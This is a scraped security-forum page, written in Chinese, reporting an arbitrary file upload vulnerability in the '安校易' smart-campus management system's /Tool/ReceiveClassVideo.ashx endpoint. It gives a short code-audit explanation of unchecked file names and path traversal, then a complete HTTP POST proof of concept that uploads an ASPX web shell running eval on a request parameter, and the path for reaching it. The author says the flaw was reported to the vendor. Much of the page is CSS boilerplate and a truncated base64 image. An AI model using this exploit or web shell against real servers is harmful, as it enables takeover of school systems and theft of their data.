6TA2Bdw9EcgDcgptutIo7tpwzv3t8a6l7ea5VyxaeqFRPyZ/840g6R8NvbH7p4vnu1et/eXWLb1jvoZvYx8KRqjnSXGvOCJYBL8wJGwQzhMuFq6G2mZ6E9gDaRhlUWMmzS6bSbonRI0iVD4C9RQTgzQdywxSfyAb4IcQbcbadmCXxTKJGSQWNbSQCLR
<style>@-moz-keyframes blink{50%{background-color:transparent}}@-webkit-keyframes blink{50%{background-color:transparent}}@keyframes blink{50%{background-color:transparent}}@media print{}pre code.hljs{overflow-x:auto}.hljs{color:#000}.hljs-keyword{color:#00f}.hljs-string,.hljs-title{color:#a31515}.markdown-body{color-scheme:light;--color-prettylights-syntax-comment:#6e7781;--color-prettylights-syntax-constant:#0550ae;--color-prettylights-syntax-entity:#8250df;--color-prettylights-syntax-storage-modifier-import:#24292f;--color-prettylights-syntax-entity-tag:#116329;--color-prettylights-syntax-keyword:#cf222e;--color-prettylights-syntax-string:#0a3069;--color-prettylights-syntax-variable:#953800;--color-prettylights-syntax-brackethighlighter-unmatched:#82071e;--color-prettylights-syntax-invalid-illegal-text:#f6f8fa;--color-prettylights-syntax-invalid-illegal-bg:#82071e;--color-prettylights-syntax-carriage-return-text:#f6f8fa;--color-prettylights-syntax-carriage-return-bg:#cf222e;--color-prettylights-syntax-string-regexp:#116329;--color-prettylights-syntax-markup-list:#3b2300;--color-prettylights-syntax-markup-heading:#0550ae;--color-prettylights-syntax-markup-italic:#24292f;--color-prettylights-syntax-markup-bold:#24292f;--color-prettylights-syntax-markup-deleted-text:#82071e;--color-prettylights-syntax-markup-deleted-bg:#FFEBE9;--color-prettylights-syntax-markup-inserted-text:#116329;--color-prettylights-syntax-markup-inserted-bg:#dafbe1;--color-prettylights-syntax-markup-changed-text:#953800;--color-prettylights-syntax-markup-changed-bg:#ffd8b5;--color-prettylights-syntax-markup-ignored-text:#eaeef2;--color-prettylights-syntax-markup-ignored-bg:#0550ae;--color-prettylights-syntax-meta-diff-range:#8250df;--color-prettylights-syntax-brackethighlighter-angle:#57606a;--color-prettylights-syntax-sublimelinter-gutter-mark:#8c959f;--color-prettylights-syntax-constant-other-reference-link:#0a3069;--color-fg-default:#24292f;--color-fg-muted:#57606a;--color-fg-subtle:#6e7781;--color-canvas-default:#ffffff;--color-canvas-subtle:#f6f8fa;--color-border-default:#d0d7de;--color-border-muted:hsl(210,18%,87%);--color-neutral-muted:rgba(175,184,193,0.2);--color-accent-fg:#0969da;--color-accent-emphasis:#0969da;--color-attention-subtle:#fff8c5;--color-danger-fg:#cf222e}.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;margin:0;color:var(--color-fg-default);background-color:var(--color-canvas-default);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji";font-size:16px;line-height:1.5;word-wrap:break-word}.markdown-body strong{font-weight:600}.markdown-body h1{margin:0.67em 0;padding-bottom:0.3em;font-size:2em;border-bottom:1px solid var(--color-border-muted)}.markdown-body img{border-style:none;max-width:100%;-webkit-box-sizing:content-box;box-sizing:content-box;background-color:var(--color-canvas-default)}.markdown-body ::-webkit-input-placeholder{color:inherit;opacity:0.54}.markdown-body ::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}.markdown-body h1,.markdown-body h2{margin-top:24px;margin-bottom:16px;font-weight:600;line-height:1.25}.markdown-body h2{font-weight:600;padding-bottom:0.3em;font-size:1.5em;border-bottom:1px solid var(--color-border-muted)}.markdown-body code{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace}.markdown-body pre{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace;word-wrap:normal}.markdown-body ::-webkit-input-placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body ::placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body::before{display:table;content:""}.markdown-body::after{display:table;clear:both;content:""}.markdown-body>*:first-child{margin-top:0!important}.markdown-body>*:last-child{margin-bottom:0!important}.markdown-body p,.markdown-body pre{margin-top:0;margin-bottom:16px}.markdown-body code{padding:0.2em 0.4em;margin:0;font-size:85%;background-color:var(--color-neutral-muted);border-radius:6px}.m
<style>#md_view{padding:0 20px}#md_view img:hover{cursor:pointer}</style>
<!--[if lt IE 9]>
    <script src="/static/js/html5shiv.min.js"></script>
    <script src="/static/js/respond.min.js"></script>
    <![endif]-->
<style>.hot{z-index:10}</style>
<style>html #layuicss-skinlayercss{display:none;position:absolute;width:1989px}@-webkit-keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);-ms-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1)}}@-webkit-keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);-ms-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);-ms-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
 * Waves v0.7.5
 * http://fian.my.id/Waves
 * 
 * Copyright 2014-2016 Alfiana E. Sibuea and other contributors
 * Released under the MIT license
 * https://github.com/fians/Waves/blob/master/LICENSE
 */</style><style>@media (max-height:620px){}@media (max-height:783px){}@-webkit-keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}@keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}</style><style>@-webkit-keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@media (pointer:coarse){}</style><style>:root{--sr-annote-color-0:#b4d9fb;--sr-annote-color-1:#ffeb3b;--sr-annote-color-2:#a2e9f2;--sr-annote-color-3:#a1e0ff;--sr-annote-color-4:#a8ea68;--sr-annote-color-5:#ffb7da}</style><style>@-webkit-keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@-webkit-keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeOut{0%{opacity:1}to{opacity:0}}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:tra
<body>
<div class="global-nav mb-50">
 <nav class="navbar navbar-inverse navbar-fixed-top">
 <div class="container nav">
 <div class="visible-xs header-response sf-hidden">
 
 
 
 
 </div>
 <div class="row hidden-xs">
 <div class="col-sm-9 col-md-9 col-lg-9">
 <div class=navbar-header>
 <button type=button class="navbar-toggle collapsed sf-hidden" data-toggle=collapse data-target=#global-navbar>
 
 
 
 
 </button>
 <div class=logo><a class="navbar-brand logo" href=https://forum.butian.net/></a></div>
 </div>
 <div class="collapse navbar-collapse" id=global-navbar>
 <ul class="nav navbar-nav">
 <li><a href=https://forum.butian.net/>首页 <span class=sr-only>(current)</span></a></li>
 
 
 
 <li><a href=https://forum.butian.net/questions>问答</a></li>
 
 
 
 <li><a href=https://forum.butian.net/shop>商城</a></li>
 
 <li><a href=https://forum.butian.net/community>实战攻防技术</a></li>
 <li><a href=https://forum.butian.net/articles>漏洞分析与复现</a>
 <span class=hot>NEW</span>
 </li>
 <li><a href=https://forum.butian.net/movable>活动</a></li>
 <li><a href=https://forum.butian.net/questions/Play>摸鱼办</a>
 
 </li>
 </ul>
 <form role=search id=top-search-form action=https://forum.butian.net/search method=GET class="navbar-form hidden-sm hidden-xs pull-right">
 <span class="btn btn-link"><span class=sr-only>搜索</span><span class="glyphicon glyphicon-search"></span></span>
 <input type=text name=word id=searchBox class=form-control placeholder value>
 </form>
 </div>
 </div>
 
 </div>
 </div>
 </nav>
</div>
<div class="top-alert mt-60 clearfix text-center">
 <!--[if lt IE 9]>
    <div class="alert alert-danger topframe" role="alert">你的浏览器实在<strong>太太太太太太旧了</strong>，放学别走，升级完浏览器再说
        <a target="_blank" class="alert-link" href="http://browsehappy.com">立即升级</a>
    </div>
    <![endif]-->
 
 </div>
<div class=wrap>
 <div class=container>
 <div class="row mt-10">
 <div class="col-xs-12 col-md-9 main" style=width:100%>
 <div class=widget-article>
 <h3 class="title word-wrap">智慧校园(安校易)管理系统存在文件上传漏洞</h3>
 <ul class=taglist-inline>
 <li class=tagPopup><a class=tag href=https://forum.butian.net/topic/56>划水摸鱼</a></li>
 </ul>
 <div class="content mt-10">
 <div class="quote mb-20">
 # 智慧校园(安校易)管理系统存在文件上传漏洞
## 一、漏洞简介
智慧校园(安校易)管理系统`/Tool/ReceiveClassVideo.ashx`接口存在任意文件上传漏洞，攻击者可通过该漏洞上传任意文件到服务...
 </div>
 <textarea id=md_view_content style=display:none value='智慧校园(安校易)管理系统存在文件上传漏洞
=====================

一、漏洞简介
------

智慧校园(安校易)管理系统`/Tool/ReceiveClassVideo.ashx`接口存在任意文件上传漏洞，攻击者可通过该漏洞上传任意文件到服务器上，包括木马后门文件，导致服务器权限被控制

二、影响版本
------

智慧校园(安校易)管理系统

三、漏洞原理分析
--------

漏洞发生在  
`\KR.Administrator\KR.Administrator.Tool\ReceiveClassVideo.cs`

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-3bbd99becb821848afb15e2ffceb1c90938340f7.png)

上述代码中可以看到通过REQUEST方式传参orgid、classID、file\_tmid三个参数，其中**orgid**对应的是**上传目录名**（经检测可以使用../进行目录穿越），**file\_tmid**对应的是**上传文件名**，classID则是班级视频表参数（不重要）；**且上述代码中未对上传文件后缀及文件内容进行检测**

**这里有个点，后面的if判断中按代码顺序把文件先删掉，然后在保存。。。**

接着找到对应调用的文件`/Tool/ImportClassVideo.aspx`  
通过观察该文件内容，发现调用文件`/Tool/ReceiveClassVideo.ashx`

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-c149361d727fbbec96c4282f3c709d2b619a9364.png)

至此代码审计结束

四、漏洞复现
------

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-fcc3b687a0a11511a0d76e71284d529a32ca5932.png)  
构造POC如下：

```php
POST /Tool/ReceiveClassVideo.ashx?file_tmid=798&amp;orgid=1&amp;classID=1 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 367
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="File1"; filename="1.aspx"
Content-Type: image/jpeg

<%@ Page Language="Jscript" validateRequest="false" %>
<%
function xxxx(str)
{
        return eval(str,"unsafe");
}
%>
<%var a = Request.Item["pass"];%>
<%var b = xxxx(a);%>
<%Response.Write(b);%>
------dqdaieopnozbkapjacdbdthlvtlyl--
```

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-16f29d7835f89983f4147de35992be66df7706a5.png)

返回的响应内容不用管

```php
访问url+Upload/AD_Info/1/798.aspx
```

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-19614d7aceef5f605909cd9baee73d26b48bbc3e.png)

五、总结
----

第一次写代码审计文章，各位大佬见谅，有什么地方错误的欢迎指出，在问题中进步。自己刚起步学**ASP.NET**审计不到一周，想着实战一下，误打误撞出了一个文件上传漏洞，该漏洞已上报厂商！！！'>智慧校园(安校易)管理系统存在文件上传漏洞
=====================

一、漏洞简介
------

智慧校园(安校易)管理系统`/Tool/ReceiveClassVideo.ashx`接口存在任意文件上传漏洞，攻击者可通过该漏洞上传任意文件到服务器上，包括木马后门文件，导致服务器权限被控制

二、影响版本
------

智慧校园(安校易)管理系统

三、漏洞原理分析
--------

漏洞发生在  
`\KR.Administrator\KR.Administrator.Tool\ReceiveClassVideo.cs`

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-3bbd99becb821848afb15e2ffceb1c90938340f7.png)

上述代码中可以看到通过REQUEST方式传参orgid、classID、file\_tmid三个参数，其中**orgid**对应的是**上传目录名**（经检测可以使用../进行目录穿越），**file\_tmid**对应的是**上传文件名**，classID则是班级视频表参数（不重要）；**且上述代码中未对上传文件后缀及文件内容进行检测**

**这里有个点，后面的if判断中按代码顺序把文件先删掉，然后在保存。。。**

接着找到对应调用的文件`/Tool/ImportClassVideo.aspx`  
通过观察该文件内容，发现调用文件`/Tool/ReceiveClassVideo.ashx`

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-c149361d727fbbec96c4282f3c709d2b619a9364.png)

至此代码审计结束

四、漏洞复现
------

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-fcc3b687a0a11511a0d76e71284d529a32ca5932.png)  
构造POC如下：

```php
POST /Tool/ReceiveClassVideo.ashx?file_tmid=798&amp;orgid=1&amp;classID=1 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 367
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="File1"; filename="1.aspx"
Content-Type: image/jpeg

&lt;%@ Page Language="Jscript" validateRequest="false" %&gt;
&lt;%
function xxxx(str)
{
        return eval(str,"unsafe");
}
%&gt;
&lt;%var a = Request.Item["pass"];%&gt;
&lt;%var b = xxxx(a);%&gt;
&lt;%Response.Write(b);%&gt;
------dqdaieopnozbkapjacdbdthlvtlyl--
```

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-16f29d7835f89983f4147de35992be66df7706a5.png)

返回的响应内容不用管

```php
访问url+Upload/AD_Info/1/798.aspx
```

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-19614d7aceef5f605909cd9baee73d26b48bbc3e.png)

五、总结
----

第一次写代码审计文章，各位大佬见谅，有什么地方错误的欢迎指出，在问题中进步。自己刚起步学**ASP.NET**审计不到一周，想着实战一下，误打误撞出了一个文件上传漏洞，该漏洞已上报厂商！！！</textarea>
 <div id=layer-photos-demo>
 <div id=md_view><div class=markdown-body><h1 blockindex=0>智慧校园(安校易)管理系统存在文件上传漏洞</h1>
<h2 blockindex=1>一、漏洞简介</h2>
<p blockindex=2>智慧校园(安校易)管理系统<code>/Tool/ReceiveClassVideo.ashx</code>接口存在任意文件上传漏洞，攻击者可通过该漏洞上传任意文件到服务器上，包括木马后门文件，导致服务器权限被控制</p>
<h2 blockindex=3>二、影响版本</h2>
<p blockindex=4>智慧校园(安校易)管理系统</p>
<h2 blockindex=5>三、漏洞原理分析</h2>
<p blockindex=6>漏洞发生在<br>
<code>\KR.Administrator\KR.Administrator.Tool\ReceiveClassVideo.cs</code></p>
<p blockindex=7><img src="data:image/png;base64,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
